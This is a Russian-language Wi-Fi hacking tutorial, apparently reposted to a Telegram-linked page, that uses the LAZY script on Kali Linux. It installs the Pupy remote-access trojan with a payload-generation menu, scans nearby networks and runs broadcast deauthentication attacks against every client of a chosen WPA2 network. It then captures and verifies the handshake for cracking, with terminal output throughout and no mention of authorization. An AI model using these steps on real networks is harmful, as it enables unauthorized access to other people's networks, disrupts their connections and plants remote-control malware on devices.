Взлом WI - FI

Взлом WI - FI

BLACK Telegram

Шаг 1: Обновление Kali Linux

Для использования скрипта LAZY, обновляем Kali Linux.

Если ваша система Kali полностью обновлена, вы можете ожидать довольно плавного процесса установки. Перед началом выполните следующие команды

apt update
apt upgrade

Шаг 2: Найдите имя вашего беспроводного сетевого адаптера

Обычно Kali-совместимым беспроводным сетевым адаптером будет wlan0 или wlan1. В режиме мониторинга измените его имя на wlan0mon или wlan1mon.

Проверьте имя вашего адаптера после перевода его в режим мониторинга, написав следущее и наблюдая за его именем:

iwconfig wlan0 mode monitor
ip a

Далее начинаем загрузку и использование «lazy» скрипт.

Шаг 3: Установите и настройте ленивый скрипт

Для установки откройте окно терминала и вставьте приведенный ниже код, по одной строке за раз, затем установите сценарий LAZY.

cd
git clone https://github.com/arismelachroinos/lscript.git
cd lscript
chmod +x install.sh
./install.sh

Когда настроите интерфейс, укажите имя вашего беспроводного сетевого адаптера.

Шаг 4: Используйте основные сетевые инструменты

Находим локальную информацию, просто набрав l, чтобы получить информацию о локальном IP, как показано ниже.

Local IPs:
eth0 = 192.168.86.42

Gateways:
eth0 = 192.168.86.1
Press any key to go back...

После этого мы можем сканировать сеть на наличие других устройств. Ниже команды, которые позволят нам узнать больше информации о сети:

  • if - Запускает ifconfig и выдает имена и информацию обо всех сетевых устройствах.
  • 1 - Включить wlan0 (d1 отключает его).3
  • 2 - Ключить wlan0mon (d2 оключает его).
  • 3 - рандомизируйте или установите MAC-адрес на определенное значение.
  • 7 - Просмотрите общедоступный IP-адрес, который ваш компьютер оставляет на посещаемых вами сайтах.
  • 19 - Найдите физический адрес данного IP-адреса, чтобы определить его относительное местоположение.
  • scan - Запустите сканирование ARP в сети, чтобы обнаружить близлежащие устройства.
  • start - запуск режима мониторинга на адаптере беспроводной сети.
  • stop - Остановить режим беспроводного мониторинга на сетевом адаптере.

Шаг 5: Установите новые инструменты

Загрузим Pupy, основанную на Python RAT. .

В следующем меню представлены основные категории с параметрами для управления установкой сценариев:

  • 1 - инструменты Wi-Fi (инструменты для атаки на беспроводные сети).
  • 2 - Удаленный доступ (инструменты для получения удаленного доступа к другим устройствам и удаленного управления ими).
  • 3 - Сбор информации (сбор информации о людях или веб-сайте).
  • 4 - Инструменты сайта (инструменты для взлома или атаки сайтов).
  • 5 - Другое (сборник других хакерских инструментов).

Чтобы установить Pupy, перейдем к варианту 2 - удаленному доступу. Здесь мы выбираем опцию 3 для Pupy. Теперь мы видим, что Pupy не установлен, потому что он отображается красным цветом.

Чтобы установить Pupy, выберите 3, и при появлении запроса введите install, чтобы скрипт LAZY управлял установкой.

Tool is not installed. To install it type 'install'.
install
Installing Pupy
Tool by n1nj4sec
Cloning into 'pupy'...
remote: Counting objects: 16472, done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 16472 (delta 20), reused 47 (delta 20), pack-reused 16416
Receiving objects: 100% (16472/16472), 27.77 MiB | 4.99 MiB/s, done.
Resolving deltas: 100% (11706/11706), done.

При завершении установки, опция должна появиться в зеленом цвете. Теперь выбираем опцию 3 и переходим к Pupy.

1) Generate a payload
2) Start listener
b) Go back
00) Main menu
0) EXIT

Теперь мы можем набрать 00, чтобы вернуться в главное меню, чтобы изучить еще некоторые функции LAZY-скрипта.

Шаг 6: Захватите рукопожатие WPA через ленивый скрипт

Если у вас есть Kali-совместимый адаптер беспроводной сети, вы должны были указать это имя для сценария LAZY в шаге 3 выше, или вы можете сделать это сейчас, набрав interfaces и установив имя адаптера в режиме станции и мониторинга.

Установив, выбираем опцию 10, чтобы выбрать меню рукопожатия. Для начала, подтверждаем, что хотим перевести адаптер в режим монитора. Чтобы подтвердить вводим Y. Когда это будет сделано, откроется новое окно терминала.

----------------------------HANDSHAKE----------------------------
 1) Scan networks nearby     Selected:None
 2) Capture handshake
 3) Aircrack the handshake
 4) Verify a handshake
 5) Clean a handshake
 6) Remove .csv and .netxml files
 0) Exit
Choose:

Чтобы увидеть сетевой трафик поблизости выбираем опцию 1. Дайте этому поработать минуту или две, а затем нажмите Crtl-C, чтобы остановить сканирование.

CH 12 ][ Elapsed: 6 s ][ 2018-07-04 04:33

BSSID               PWR   Beacons   #Data,  #/s    CH    MB     ENC   CIPHER  AUTH  ESSID

00:25:00:FF:94:73    -1         0       1     0     6    -1     OPN                 <length:  0>
70:3A:CB:DB:5A:78   -41        11       3     0    11    130    WPA2  CCMP    PSK   takeyourgodd
70:3A:CB:DB:5C:A8   -59        22       0     0     6    130    WPA2  CCMP    PSK   takeyourgodd
70:3A:CB:DB:5C:B4   -71         6       0     0     1    130    WPA2  CCMP    PSK   takeyourgodd
C4:8E:8F:E5:6A:B4   -75         7       0     0     1    195    WPA2  CCMP    PSK   TG1672G12

BSSID               STATION         PWR   RATE      Lost    Frames  Probe

00:25:00:FF:94:73   obfuscated      -43    0 -12      21         8
00:25:00:FF:94:73   obfuscated      -33    0 -12     104         4
00:25:00:FF:94:73   obfuscated      -51    0 -12     107         4
00:25:00:FF:94:73   obfuscated      -53    0 -12      34         8
(not associated)    obfuscated      -70    0 - 1      12         8

Вы увидите список сетей, в которых есть трафик. Выбераем номер целевой сети и нажмаем Return, чтобы продолжить.

После ввода имени и нажатия кнопки возврата откроется новое окно, в котором представлены варианты отключения устройств от сети. Выберите опцию 1, чтобы отменить аутентификацию всех клиентов и быстро получить сетевое рукопожатие.

----------------DEAUTH MENU----------------

 1) Deauth all                   aireplay-ng
 2) Deauth all                   mdk3
 3) Deauth client/s              aireplay-ng
 4) Deauth all periodically      aireplay-ng
 0) Exit
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:33

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78   -40   87      134      92     6  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate      Lost  Frames  Probe

70:3A:CB:DB:5A:78   obfuscated      -72      0 - 0      22       6

Откроется новое окно, показывающее статус атаки деавторизации. Нажмите Ctrl-C, чтобы остановить атаку по умолчанию.

----------------DEAUTH MENU----------------

 1) Deauth all                   aireplay-ng
 2) Deauth all                   mdk3
 3) Deauth client/s              aireplay-ng
 4) Deauth all periodically      aireplay-ng
ENTER) Last option
 0) Exit
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 2 mins ][ 2018-07-04 04:36 ][ WPA handshake: 70:3A:CB:DB:5A:78

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78    -7  100     1307     151     2  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate        Lost  Frames  Probe

70:3A:CB:DB:5A:78   obfuscated      -33      1e - 1e       0      12
---------------------------------DEAUTHING---------------------------------

04:36:17 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:18 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:18 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:20 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:20 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:21 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:21 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:22 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:22 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:23 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:23 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]

После выбора сети вы попадете в меню «рукопожатие». Здесь мы можем подтвердить рукопожатие, которое мы только что захватили, выбрав опцию 4, которая должна подтвердить рукопожатие.

----------------------------HANDSHAKE----------------------------
 1) Scan networks nearby     Selected:takeyourgoddamnshoesoff
 2) Capture handshake
 3) Aircrack the handshake
 4) Verify a handshake
 5) Clean a handshake
 6) Remove .csv and .netxml files
 0) Exit
Choose:

В меню deauth вы увидите параметры для подтверждения того, что вы успешно захватили рукопожатие. Выберите вариант 2, чтобы проверить рукопожатие с Cowpatty.

-------DEAUTH MENU-------

 1) Check with pyrit
 2) Check with cowpatty
 b) Go back
Choose:
1
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:37

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78   -40  100      156       0     0  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate        Lost  Frames  Probe

Here, you can see our handshake is valid:

-------DEAUTH MENU-------

Valid handshake found!
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:37

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78   -37   96      297       0     0  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate        Lost  Frames  Probe

После подтверждения того, что рукопожатие действительно, вы вернетесь обратно в меню рукопожатия. Выберите опцию 0, чтобы выйти из скрипта.

----------------------------HANDSHAKE----------------------------
 1) Scan networks nearby     Selected:takeyourgoddamnshoesoff
 2) Capture handshake
 3) Aircrack the handshake
 4) Verify a handshake
 5) Clean a handshake
 6) Remove .csv and .netxml files
 0) Exit
Choose:

При выходе сценарий спросит, захватили ли вы рукопожатие WPA. Если вы это сделали, обязательно наберите y, чтобы сохранить захваченное рукопожатие под именем файла, которое вы указали ранее.

Шаг 7: Используйте WPS Pixie-Dust Attack (работа в процессе).

Две основные атаки вернули «слишком много аргументов», а не какие-либо полезные результаты. Последний вариант, цикл Pixie-Dust, завершился ошибкой после накопления антиклиматического эффекта.



Report Page